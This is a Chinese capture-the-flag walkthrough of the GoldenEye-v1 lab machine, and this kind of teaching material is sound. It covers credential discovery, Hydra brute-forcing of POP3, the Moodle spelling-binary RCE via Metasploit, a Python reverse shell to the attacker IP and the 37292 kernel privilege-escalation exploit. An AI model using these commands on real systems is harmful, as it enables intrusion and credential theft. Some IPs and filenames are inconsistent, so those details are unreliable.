首页 > 其他分享 >1-GoldenEye-v1

1-GoldenEye-v1

时间:2024-06-20 10:23:02浏览次数:6  
标签:http 登录 192.168 pop3 v1 125.140 GoldenEye com

环境

靶机:192.168.125.140
Kali:192.168.125.139

信息搜集

扫描存活主机

nmap -sP 192.168.125.0/24

扫描对目标主机进行扫描

nmap -sS -sV -T5 -A  192.168.125.140

目标主机开放25端口smtp服务,80端口http服务。

访问目标主机。

大致意思是未发现用户,导航到/sev-home/目录。对该目录进行访问,发现登录页面,但是用户名密码均未知,先记录下来,继续搜集信息。

F12查看上一个页面源码,发现terminal.js文件,尝试进行访问,发现隐藏信息。

可以发现两个用户名Boris、Natalya,一个密码HTML解码得到InvincibleHack3r,进入刚才的登录界面分别进行尝试,成功登录(最终账号密码:boris/InvincibleHack3r)

"我们已经将pop3服务配置为运行在一个非常高的非默认端口上"

第三句给出提示,pop3服务运行在一个非默认端口(默认端口为110),根据所给信息,再次对原主机进行端口扫描。

nmap -p- 192.168.4.202

发现55006,55007两个开放的端口,继续扫描端口开启的服务详细信息:

nmap -sS -sV -T5 -A -p55006,55007 192.168.125.140

可以发现两个端口都开放了pop3邮件服务,尝试访问http://192.168.4.202:55007/失败。前面已知存在两个用户Boris、Natalya,尝试进行暴力破解,通过nc进行登录pop3服务。

echo -e 'natalya\nboris' > useers.txt
hydra -L dayu.txt -P /usr/share/wordlists/fasttrack.txt 192.168.125.140 -s 55007 pop3

得到结果:

[55007][pop3] host: 192.168.125.140   login: natalya   password: bird
[55007][pop3] host: 192.168.125.140   login: boris   password: secret1!

分别登录pop3并分别查看邮件内容。

nc 192.168.4.202 55007     # 登录邮箱
user boris                 # 登录用户 natalya
pass secret1!              # 登录密码 bird
list                       # 查看邮件数量
retr 1~3                   # 查看邮件内容

boris第二封邮件中提到“natalya,称她可以破坏鲍里斯的密码”;第三封邮件中提到“附件是黄金眼的最终访问密码。把它们放在这个服务器根目录下的一个隐藏文件中;一旦Xenia进入训练地点并熟悉黄金眼终端代码我们将进入最后阶段....”(应该就是flag吧!)

natalya第一封邮件提到“一个名为 Janus 的犯罪集团正在追捕 GoldenEye”;第二封邮件:

用户名:xenia
密码:RCP90rulez!
boris证实了她是合法的承包商所以只要创建账户,好吗?
如果你在外部内部域名上没有网址:severnaya-station.com/gnocertdir
**请确保编辑您的主机文件,因为您通常在网络外远程工作....
因为你是一个Linux用户,只要把这个服务器的IP指向/etc/hosts中的severnaya-station.com即可

得到一个新的用户名和密码,并且通过提示可以知道,要想访问到到它的服务器需要进行hosts文件配置

vim /etc/hosts
# 添加
192.168.125.140 severnaya-station.com

访问http://severnaya-station.com/gnocertdir/,可以看到是一个moodle的CMS,进行登录。

可以在Home/My profile/Messages中看到一个用户Doak的来信,并且可以在左上角看到该moodle的版本为2.2.3,先记录下来。同上面的步骤一样,对Doak的密码进行爆破。

[55007][pop3] host: 192.168.4.202   login: doak   password: goat

在此通过nc登录,查看邮件

James,
如果你正在阅读这篇文章,恭喜你已经走到了这一步。你知道谍报技术是怎么运作的吧?
因为我不知道。去我们的培训网站,登陆我的账号....继续挖,直到你能获取更多信息......
用户名:dr_doak
密码:4England!

看样子应该马上成功了。根据所提供的用户名和密码再次登录CMS,登录后在Message处发现同管理员的通信;在Home/ My home 右边发现文件s3cret.txt,下载查看内容:

007年,
我能够通过clear txt捕捉这个应用程序adm1n cr3ds。 
GoldenEye服务器中的大多数web应用程序中的文本都会被扫描,所以我不能在这里添加cr3dentials。
有趣的文件在这里:/dir007key/for-007.jpg

访问http://severnaya-station.com/dir007key/for-007.jpg,一张沙掉的图片,wget http://severnaya-station.com/dir007key/for-007.jpg下下来看看,exiftool for-007.jpg查看图片隐藏的一些底层内容。

可以发现有一条base64编码隐藏信息:eFdpbnRlcjE5OTV4IQ==,解码得到:xWinter1995x!。根据线索可以知道这应该是管理员的密码,再次登录CMS,成功拿到CMS的管理员权限。

漏洞利用

根据上面所得到的Moodle版本信息,搜索Moodle 2.2.3 exp cve发现有CVE-2013-3630 漏洞可利用。

使用MSF继续进行渗透

msfconsole          # 进入msf
search moodle       # 查找moodle类型攻击的模块

这里用第二个moodle splling binary rce,【搜到的是Moodle - Remote Command Execution,这里有点迷惑,对漏洞原理还是不太清楚,可查看文末相关链接】

use 1                             # 调用1  
show options                      # 显示所有选项
set username admin                # 设置用户名
set password xWinter1995x!        # 设置密码
set rhost severnaya-station.com   # 设置:rhosts
set targeturi /gnocertdir         # 设置目录: /gnocertdir
set payload cmd/unix/reverse      # 设置payload
set lhost 192.168.125.140           # 设置:lhost(需要本地IP)

所有设置完成后run失败,是因为exp应用的shell和moodle原本所设置的Google Spell不同,需进行修改。

管理员身份进入系统对shell进行修改,记得保存。

run运行成功获得shell,查看身份。

获取交互式shell,查看主机内核信息。

python -c 'import pty; pty.spawn("/bin/bash")'     # 获取交互式tty
uname -a    # 查看主机内核

搜索:Linux ubuntu 3.13.0-32 exploit,获得exp版本:37292,CVE(CAN) ID: CVE-2015-1328。在kali中搜索攻击脚本:

searchsploit 37292        # 搜索kali本地的exp库中37292攻击脚本信息
cp /usr/share/exploitdb/exploits/linux/local/37292.c /root/桌面/   # 将脚本文件复制到当前目录

脚本需要gcc进行编译,而目标系统没有gcc,但是可以用cc进行编译。(可用which gcc查看是否安装)

修改脚本内容,将143行gcc修改为cc保存。

kali开启http服务,供靶机下载攻击脚本。

python -m http.server 8081 # 开区http服务

wget http://192.168.125.140:8081 # 靶机下载脚本文件

对下载下来的脚本进行编译运行,成功获取root权限。进入根目录获取flag。

cc -o exp 37292.c     # C语言的CC代码编译点c文件
chmod +x exp          # 编译成可执行文件,并赋权
./exp                 # 执行

id                   # 查看目前权限
cat .flag.txt  # 读取root下的flag信息
"568628e0d993b1973adc718237da6e93"

【另一种获取shell的方式】

Home/Site administration/Server/System paths处有执行系统命令的地方,对其进行修改。(记得保存)

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.125.139",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subproce

在kali中c -lvp 6666进行监听。

Home/My profile/Blogs/Add a new entry处有触发点,点击触发后上方nc得到shell。

参考文章及漏洞相关链接:

https://blog.csdn.net/weixin_43938645/article/details/127339270

https://www.rapid7.com/db/modules/exploit/multi/http/moodle_spelling_binary_rce/

https://www.exploit-db.com/exploits/29324

https://www.exploit-db.com/exploits/37292

标签:http,登录,192.168,pop3,v1,125.140,GoldenEye,com
From: https://www.cnblogs.com/awsszzfff/p/18258152

相关文章

  • 0day 未公开 U8+CRM V13-V16.5系统存在任意文件读取漏洞
     0x01阅读须知        技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用......
  • DHorse v1.5.1 发布,基于 k8s 的发布平台
    版本说明新增特性支持k8s的v1.30.x版本;优化特性优化回滚功能;修复注册来源的回滚问题;新增和修改应用时校验应用名;升级kubernetes-client至v6.13.0;调整部署明细表头展示;升级指南升级指南DHorse介绍DHorse是一个轻量级、简单易用的云应用管理平台,具有多云和多环境管......
  • 【YOLOv10改进[注意力]】在YOLOv10中添加坐标注意力CoordAtt + 含全部代码和详细修改
    本文将进行在YOLOv10中添加坐标注意力CoordAtt的实践,助力YOLOv10目标检测效果的实践,文中含全部代码、详细修改方式以及手撕结构图。助您轻松理解改进的方法。改进前和改进后的参数对比: 目录一CoordAtt二在YOLOv10中添加注意力CoordAtt的实践1整体修改......
  • 【YOLOv10改进[注意力]】在YOLOv10中使用注意力MLCA的实践+ 含全部代码和详细修改方式
    本文将进行在YOLOv10中添加注意力MLCA的实践,助力YOLOv10目标检测效果的实践,文中含全部代码、详细修改方式以及手撕结构图。助您轻松理解改进的方法。改进前和改进后的参数对比: 目录一MLCA二在YOLOv10中使用注意力MLCA的实践1整体修改......
  • HCIP-HarmonyOS Application DeveloperV1.0 考点
    系统及应用场景介绍系统及应用场景介绍HarmonyOS三大特征:“硬件互助,资源共享”、“一次开发,多端部署”、“统一OS,弹性部署”HarmonyOSConnect(中文名称:鸿蒙智联)是华为消费者业务面向生态智能硬件的全新技术品牌。HarmonyOSConnect来自WorksWithHUAWEIHiLink品牌......
  • [YOLOv10涨点改进:注意力魔改 | 轻量级的 Mixed Local Channel Attention (MLCA),加强通
    本文属于原创独家改进:一种轻量级的MixedLocalChannelAttention(MLCA)模块,该模块考虑通道信息和空间信息,并结合局部信息和全局信息以提高网络的表达效果1.YOLOv10介绍论文:[https://arxiv.org/pdf/2405.14458]代码:https://gitcode.com/THU-MIG/yolov10?utm_source=c......
  • Docker系列 V1 - 在 Ubuntu 24.04 LTS 上安装 Docker
    在Ubuntu24.04LTS上,虽然可以通过Ubuntu的官方仓库直接安装Docker,但是这种方法通常无法获取到最新的Docker版本,而且安全更新也可能延迟。因此,推荐从Docker的官方仓库进行安装,确保可以用上最新版本并和自动更新。第1步:更新软件包并安装必要软件运行以下命令,更新软件......
  • Git学习记录v1.0
    1、常用操作gitclonegitconfiggitbranchgittcheckoutgitstatusgitaddgitcommitgitpushgitpullgitloggittag1.1gitclone从git服务器拉取代码gitclonehttps://gitee.com/xxx/studyJava.git1.2gitconfig配置开发者用户名和邮箱gitconfiguser.......
  • 首途第三十三套清新简约卡片风格蓝紫渐变色短视频模板 | 苹果CMSV10主题
    下载地址:首途第三十三套清新简约卡片风格蓝紫渐变色短视频模板|苹果CMSV10主题首途第三十三套清新简约卡片风格蓝紫渐变色短视频模板|苹果CMSV10主题我们的简约风格,以纯洁的白色和深邃的紫色为主色调,为您提供了一种清新、时尚的浏览体验。在这个简洁而美丽的界面中,您可以......
  • openEuler22.03(LTS-SP3)安装kubernetesV1.29
    一、环境配置主机配置角色系统版本IPmaster012核4GmasteropenEuler22.03(LTS-SP3)192.168.0.111master022核4GmasteropenEuler22.03(LTS-SP3)192.168.0.112master032核4GmasteropenEuler22.03(LTS-SP3)192.168.0.113worker012核4GworkeropenEu......